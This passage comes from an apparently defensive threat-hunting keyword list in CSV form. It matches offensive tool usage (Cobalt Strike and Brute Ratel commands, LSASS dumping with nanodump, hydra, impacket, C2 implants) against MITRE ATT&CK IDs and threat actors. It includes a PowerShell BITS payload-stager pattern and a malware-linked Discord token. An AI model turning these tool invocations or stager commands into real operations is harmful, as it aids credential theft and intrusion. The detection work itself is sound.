Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "https://tor2web.*","https\:\/\/tor2web\..{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "https://transfer.sh/get/*/*.py*","https\:\/\/transfer\.sh\/get\/.{0,1000}\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","transfer.sh","Downloading python scripts from transfer.sh","T1105 - T1204 - T1071 - T1195","TA0002 - TA0005 - TA0006","N/A","N/A","Collection","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","1","N/A","10","8","N/A","N/A","N/A","N/A" "https://www.nirsoft.net/utils/webcamimagesave.zip","https\:\/\/www\.nirsoft\.net\/utils\/webcamimagesave\.zip","offensive_tool_keyword","nirsoft","designed to capture webcam images","T1125 - T1056.004 - T1140","TA0005 - TA0006","N/A","N/A","Collection","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","1","N/A","10","8","N/A","N/A","N/A","N/A" "hydra -*","hydra\s\-.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "Impacket *","Impacket\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "impersonate *\*","impersonate\s.{0,1000}\\.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "import boko*","import\sboko.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","0","N/A","N/A","1","65","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" "inceptor*dotnet*","inceptor.{0,1000}dotnet.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "kerberoast *","kerberoast\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "koh exit*","koh\sexit.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "koh list*","koh\slist.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "Ladon *-* *","Ladon\s.{0,1000}\-.{0,1000}\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "Ladon *.exe*","Ladon\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "Ladon */* *","Ladon\s.{0,1000}\/.{0,1000}\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "Ladon Mac * ","Ladon\sMac\s.{0,1000}\s","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "Lapsdump *","Lapsdump\s.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "LdapSignCheck *","LdapSignCheck\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","0","N/A","10","10","161","24","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "ldeep *","ldeep\s.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "list_exports *.dll*","list_exports\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "load *.cna","load\s.{0,1000}\.cna","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "make_token *","make_token\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "make_token *","make_token\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","0","N/A","10","10","155","24","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" "masscan *","masscan\s.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "memdump *","memdump\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "memex /*.exe*","memex\s\/.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "memhunt *","memhunt\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "MTE2NTc2MDM5MjY5NDM1NDA2MA.GRSNK7.OHxJIpJoZxopWpF_S3zy5v2g7k2vyiufQ183Lo","MTE2NTc2MDM5MjY5NDM1NDA2MA\.GRSNK7\.OHxJIpJoZxopWpF_S3zy5v2g7k2vyiufQ183Lo","offensive_tool_keyword","BlazeStealer","Malicious python packages","T1059 - T1064 - T1203 - T1566.001 - T1140 - T1056.004","TA0001 - TA0002 - TA0005 - TA0009","N/A","N/A","Malware","https://medium.com/checkmarx-security/python-obfuscation-traps-1acced941375","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "na.exe *","na\.exe\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "nanodump*","nanodump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "needle_sift *","needle_sift\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","0","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" "net.recon *","net\.recon\s.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "nikto -*","nikto\s\-.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "nimplant","nimplant","offensive_tool_keyword","nimplant","user agent default field - A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "nimplant *","nimplant\s.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "noclient-3.*","noclient\-3\..{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "onex install *","onex\sinstall\s.{0,1000}","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "polenum *:*","polenum\s.{0,1000}\:.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "posh -u *","posh\s\-u\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "powershell.exe -nop -c ""start-job *Import-Module BitsTransfer*$env:temp*GetRandomFileName()*Start-BitsTransfer -Source 'http*Remove-Item*Receive-Job*","powershell\.exe\s\-nop\s\-c\s\""start\-job\s.{0,1000}Import\-Module\sBitsTransfer.{0,1000}\$env\:temp.{0,1000}GetRandomFileName\(\).{0,1000}Start\-BitsTransfer\s\-Source\s\'http.{0,1000}Remove\-Item.{0,1000}Receive\-Job.{0,1000}","offensive_tool_keyword","powershell","deployment of a payload through a PowerShell stager using bits to download","T1197","TA0009","N/A","N/A","Collection","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "ps_ex *","ps_ex\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "psgrep *","psgrep\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "pupysh","pupysh","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 